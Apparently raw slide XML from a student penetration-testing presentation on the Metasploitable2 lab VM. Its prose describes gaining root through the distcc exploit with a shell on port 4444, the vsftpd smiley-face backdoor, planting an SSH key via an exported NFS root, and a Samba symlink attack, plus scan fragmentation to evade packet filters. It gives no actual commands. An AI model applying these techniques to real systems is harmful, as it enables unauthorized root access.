              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DistCC is used because makes it easy to scale large compiler jobs across a farm of like-configured systems. But the problem with this service is that an attacker can easily abuse it to run a command of their choice. First we use the distcc exploit and use a bind_ruby payload. Set the RHOST to the target’s IP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="463" name="Shape 463"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3771850"/>
            <a:ext cx="6975575" cy="1371649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Shape 464"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4831675" y="2087975"/>
            <a:ext cx="3854999" cy="1588500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>and exploit. Then we download another exploit onto our target’s system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="465" name="Shape 465"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2183450"/>
            <a:ext cx="4831681" cy="1588399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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9" name="Shape 469"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Shape 470"/>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sz="3000"/>
              <a:t>Use the DistCC Daemon to escalate yourself to the root user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Shape 471"/>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rPr lang="en" sz="1800"/>
              <a:t>Next start listening on port 4444. Run the exploit on the target’s system and now we are connected through port 4444 as root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="472" name="Shape 472"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2930712"/>
            <a:ext cx="5905500" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="473" name="Shape 473"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="20083"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3930850"/>
            <a:ext cx="7010400" cy="1240775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="474" name="Shape 474"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="60200"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2532667"/>
            <a:ext cx="4133850" cy="398050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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8" name="Shape 478"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Shape 479"/>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FTP Backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Shape 480"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1063375"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>On port 21, Metasploitable2 runs vsftpd, a popular FTP server. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" [ a happy face ], the backdoored version will open a listening shell on port 6200</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="481" name="Shape 481"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="12785"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3722925"/>
            <a:ext cx="3343275" cy="1420574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="482" name="Shape 482"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5130750" y="3977375"/>
            <a:ext cx="3438525" cy="1038225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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6" name="Shape 486"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Shape 487"/>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sz="1800"/>
              <a:t>Use rpcinfo to identify NFS and showmount -e to determine that the root of the file system is being exported</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Shape 488"/>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rPr lang="en" sz="1800"/>
              <a:t>Here we look at the NFS. Using rpcinfo we can identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="489" name="Shape 489"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1989400"/>
            <a:ext cx="2711400" cy="3154099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="490" name="Shape 490"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520425" y="2608475"/>
            <a:ext cx="4198950" cy="909050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Shape 491"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258875" y="2799975"/>
            <a:ext cx="1839299" cy="395099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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92" name="Shape 492"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258875" y="3524625"/>
            <a:ext cx="1839299" cy="395099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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6" name="Shape 496"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="Shape 497"/>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SSH Keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Shape 498"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="961700"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Here, since ssh is running, we can generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="499" name="Shape 499"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094350" y="2324575"/>
            <a:ext cx="1778537" cy="115058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="500" name="Shape 500"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094350" y="2439633"/>
            <a:ext cx="2169117" cy="134234"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="501" name="Shape 501"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094350" y="2573867"/>
            <a:ext cx="3361783" cy="108666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="502" name="Shape 502"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094350" y="2682533"/>
            <a:ext cx="4631171" cy="134234"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="503" name="Shape 503"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094350" y="2816768"/>
            <a:ext cx="5049650" cy="2326731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="504" name="Shape 504"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2324575"/>
            <a:ext cx="3756175" cy="2818925"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Shape 66"/>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Scanning Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 67"/>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i="1" lang="en"/>
              <a:t>Fragmentation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(-f)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fragments TCP header of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> probe packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Some level of success against packet filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fragments may be too small for some networks, programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fails when packet fragments are queued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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8" name="Shape 508"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Shape 509"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205978"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Launch a symlink attack on Samba to get anonymous root privileges on the Metasploitable VM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Shape 510"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="927650"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samba, when configured with a writeable file share and "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>wide links</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. Here we can see that the tmp folder is writeable. So we use metasploit to exploit it then we can anonymously logon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="511" name="Shape 511"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3599975" y="1984046"/>
            <a:ext cx="5544025" cy="2391078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="512" name="Shape 512"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4550800" y="4375125"/>
            <a:ext cx="4593200" cy="768375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="513" name="Shape 513"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1984050"/>
            <a:ext cx="3599974" cy="2211974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="Shape 514"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347450" y="2697775"/>
            <a:ext cx="1587300" cy="88500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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8" name="Shape 518"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Shape 519"/>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a:t>Day 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="Shape 520"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840053"/>
            <a:ext cx="7772400" cy="784799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Handsome Seastars</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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4" name="Shape 524"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Shape 525"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840053"/>
            <a:ext cx="7772400" cy="784799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Handsome Seastars</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Shape 526"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1583342"/>
            <a:ext cx="7772400" cy="1159799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
